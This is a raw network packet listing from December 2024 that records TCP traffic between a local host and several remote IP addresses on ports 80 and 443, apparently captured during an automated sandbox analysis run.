Dec 9, 2024 08:08:26.897109032 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.897181034 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.897206068 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.897248983 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.898287058 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.898332119 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.898369074 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.898422956 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.899429083 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.899476051 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.899544954 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.899588108 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.900665045 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.900741100 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.900794029 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.901844978 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.902029991 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.902089119 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.902964115 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.903007984 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.903048038 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.903603077 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.904124022 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.904171944 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.904231071 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.904299021 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.905329943 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.905374050 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.905436993 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.905497074 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.906522989 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.906584978 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.906645060 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.907643080 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.907707930 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.907766104 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.907808065 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.908870935 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.908914089 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.909214973 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.909257889 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.909981012 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.910024881 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.910093069 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.910136938 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.911242962 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.911288023 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.911410093 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.911453962 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.912332058 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.912379026 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.912431002 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.912476063 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.913516045 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.913558960 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.913620949 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.913683891 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.914730072 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.914772987 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.914805889 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.914848089 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.915945053 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.915987968 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.916098118 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.916140079 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.917042017 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.917087078 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.917146921 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.917185068 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.918277025 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.918338060 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.918390989 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.918432951 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.919384956 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.919426918 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.919488907 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.919532061 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.920563936 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.920607090 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.920641899 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.920682907 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.921649933 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.921729088 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:27.052357912 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:27.052412987 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:27.052448988 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:27.052617073 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:27.052894115 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:27.052937031 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:27.053014040 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:27.053056002 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:27.054111004 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:27.054153919 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:27.054303885 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:27.054346085 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:27.055262089 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:27.055305004 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:27.055334091 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:27.055380106 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:27.056464911 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:27.056508064 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:27.056595087 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:27.056644917 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:27.057631016 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:27.057676077 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:27.057761908 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:27.057804108 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:27.058765888 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:27.058809996 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:27.058872938 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:27.058914900 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:27.059927940 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:27.059968948 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:27.060051918 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:27.060094118 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:27.061145067 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:27.061188936 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:27.061300993 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:27.061343908 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:27.062314987 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:27.062362909 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:27.062587976 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:27.062642097 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:27.063685894 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:27.063746929 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:27.063782930 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:27.063827991 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:27.064615011 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:27.064659119 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:27.064729929 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:27.064775944 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:27.065799952 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:27.065840960 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:27.065900087 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:27.065937996 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:27.066973925 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:27.067013025 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:27.067097902 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:27.067140102 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:27.068202019 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:27.068245888 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:27.068280935 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:27.068324089 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:27.069314003 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:27.069359064 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:27.069400072 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:27.069443941 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:27.070528984 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:27.070574045 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:27.070667028 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:27.070708990 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:27.071628094 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:27.071676016 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:27.973436117 CET	443	49814	104.21.16.9	192.168.2.4
Dec 9, 2024 08:08:27.973543882 CET	443	49814	104.21.16.9	192.168.2.4
Dec 9, 2024 08:08:27.973608017 CET	49814	443	192.168.2.4	104.21.16.9
Dec 9, 2024 08:08:27.973851919 CET	49814	443	192.168.2.4	104.21.16.9
Dec 9, 2024 08:08:27.973877907 CET	443	49814	104.21.16.9	192.168.2.4
Dec 9, 2024 08:08:28.139573097 CET	49820	443	192.168.2.4	104.21.16.9
Dec 9, 2024 08:08:28.139614105 CET	443	49820	104.21.16.9	192.168.2.4
Dec 9, 2024 08:08:28.139681101 CET	49820	443	192.168.2.4	104.21.16.9
Dec 9, 2024 08:08:28.139991999 CET	49820	443	192.168.2.4	104.21.16.9
Dec 9, 2024 08:08:28.140005112 CET	443	49820	104.21.16.9	192.168.2.4
Dec 9, 2024 08:08:29.294720888 CET	49801	80	192.168.2.4	185.215.113.43
Dec 9, 2024 08:08:29.295193911 CET	49826	80	192.168.2.4	185.215.113.43
Dec 9, 2024 08:08:29.350284100 CET	443	49820	104.21.16.9	192.168.2.4
Dec 9, 2024 08:08:29.350442886 CET	49820	443	192.168.2.4	104.21.16.9
Dec 9, 2024 08:08:29.355509996 CET	49820	443	192.168.2.4	104.21.16.9
Dec 9, 2024 08:08:29.355516911 CET	443	49820	104.21.16.9	192.168.2.4
Dec 9, 2024 08:08:29.355766058 CET	443	49820	104.21.16.9	192.168.2.4
Dec 9, 2024 08:08:29.356935024 CET	49820	443	192.168.2.4	104.21.16.9
Dec 9, 2024 08:08:29.357089996 CET	49820	443	192.168.2.4	104.21.16.9
Dec 9, 2024 08:08:29.357089996 CET	49820	443	192.168.2.4	104.21.16.9
Dec 9, 2024 08:08:29.357124090 CET	443	49820	104.21.16.9	192.168.2.4
Dec 9, 2024 08:08:29.414468050 CET	80	49801	185.215.113.43	192.168.2.4
Dec 9, 2024 08:08:29.414495945 CET	80	49826	185.215.113.43	192.168.2.4
Dec 9, 2024 08:08:29.414530993 CET	49801	80	192.168.2.4	185.215.113.43
Dec 9, 2024 08:08:29.414589882 CET	49826	80	192.168.2.4	185.215.113.43
Dec 9, 2024 08:08:29.415162086 CET	49826	80	192.168.2.4	185.215.113.43
Dec 9, 2024 08:08:29.534372091 CET	80	49826	185.215.113.43	192.168.2.4
Dec 9, 2024 08:08:30.114707947 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:30.233998060 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:30.234078884 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:30.237087011 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:30.356436968 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:30.364905119 CET	443	49820	104.21.16.9	192.168.2.4
Dec 9, 2024 08:08:30.365042925 CET	443	49820	104.21.16.9	192.168.2.4
Dec 9, 2024 08:08:30.365103960 CET	49820	443	192.168.2.4	104.21.16.9
Dec 9, 2024 08:08:30.365196943 CET	49820	443	192.168.2.4	104.21.16.9
Dec 9, 2024 08:08:30.365211010 CET	443	49820	104.21.16.9	192.168.2.4
Dec 9, 2024 08:08:30.680839062 CET	49828	443	192.168.2.4	104.21.16.9
Dec 9, 2024 08:08:30.680897951 CET	443	49828	104.21.16.9	192.168.2.4
Dec 9, 2024 08:08:30.680986881 CET	49828	443	192.168.2.4	104.21.16.9
Dec 9, 2024 08:08:30.681260109 CET	49828	443	192.168.2.4	104.21.16.9
Dec 9, 2024 08:08:30.681274891 CET	443	49828	104.21.16.9	192.168.2.4
Dec 9, 2024 08:08:30.761097908 CET	80	49826	185.215.113.43	192.168.2.4
Dec 9, 2024 08:08:30.761167049 CET	49826	80	192.168.2.4	185.215.113.43
Dec 9, 2024 08:08:30.762756109 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:30.762991905 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:30.882239103 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:30.882319927 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:30.882406950 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:30.882467985 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:30.882541895 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:31.001745939 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:31.597182035 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:31.597229958 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:31.600111008 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:31.719487906 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:31.898008108 CET	443	49828	104.21.16.9	192.168.2.4
Dec 9, 2024 08:08:31.898086071 CET	49828	443	192.168.2.4	104.21.16.9
Dec 9, 2024 08:08:31.899133921 CET	49828	443	192.168.2.4	104.21.16.9
Dec 9, 2024 08:08:31.899144888 CET	443	49828	104.21.16.9	192.168.2.4
Dec 9, 2024 08:08:31.899373055 CET	443	49828	104.21.16.9	192.168.2.4
Dec 9, 2024 08:08:31.900393009 CET	49828	443	192.168.2.4	104.21.16.9
Dec 9, 2024 08:08:31.900538921 CET	49828	443	192.168.2.4	104.21.16.9
Dec 9, 2024 08:08:31.900568008 CET	443	49828	104.21.16.9	192.168.2.4
Dec 9, 2024 08:08:31.900630951 CET	49828	443	192.168.2.4	104.21.16.9
Dec 9, 2024 08:08:31.900639057 CET	443	49828	104.21.16.9	192.168.2.4
Dec 9, 2024 08:08:32.221751928 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:32.221807003 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:32.221807957 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:32.221817970 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:32.221849918 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:32.221932888 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:32.221942902 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:32.221968889 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:32.221993923 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:32.221995115 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:32.222008944 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:32.222019911 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:32.222026110 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:32.222049952 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:32.222049952 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:32.222153902 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:32.222163916 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:32.222187042 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:32.222208023 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:32.341650963 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:32.341676950 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:32.341789007 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:32.356307030 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:32.360094070 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:32.361062050 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:32.414768934 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:32.414783001 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:32.414856911 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:32.418952942 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:32.419053078 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:32.419111013 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:32.425440073 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:32.425633907 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:32.425703049 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:32.433774948 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:32.433861971 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:32.433949947 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:32.442105055 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:32.442162991 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:32.442214012 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:32.450485945 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:32.450601101 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:32.450664997 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:32.458869934 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:32.459003925 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:32.459053040 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:32.467205048 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:32.467339039 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:32.467395067 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:32.475677967 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:32.475692034 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:32.475750923 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:32.480294943 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:32.483922005 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:32.483954906 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:32.483977079 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:32.483999968 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:32.491583109 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:32.491631985 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:32.491686106 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:32.606930017 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:32.607086897 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:32.607148886 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:32.609420061 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:32.609565020 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:32.609616995 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:32.614450932 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:32.614532948 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:32.614583969 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:32.619379044 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:32.619496107 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:32.619554996 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:32.624428034 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:32.624566078 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:32.624609947 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:32.629147053 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:32.629236937 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:32.629288912 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:32.633949995 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:32.634053946 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:32.634104967 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:32.638737917 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:32.638854027 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:32.638911009 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:32.643493891 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:32.643604994 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:32.643671036 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:32.648260117 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:32.648340940 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:32.648395061 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:32.653057098 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:32.653126955 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:32.653201103 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:32.653307915 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:32.657874107 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:32.658214092 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:32.658271074 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:32.662602901 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:32.662659883 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:32.662774086 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:32.662806988 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:32.667440891 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:32.667494059 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:32.667552948 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:32.667602062 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:32.672131062 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:32.672172070 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:32.672214031 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:32.672214985 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:32.676956892 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:32.677090883 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:32.677149057 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:32.681675911 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:32.681727886 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:32.681809902 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:32.681936026 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:32.686496973 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:32.686618090 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:32.686667919 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:32.691226006 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:32.691365957 CET	80	49829	185.215.113.16	192.168.2.4
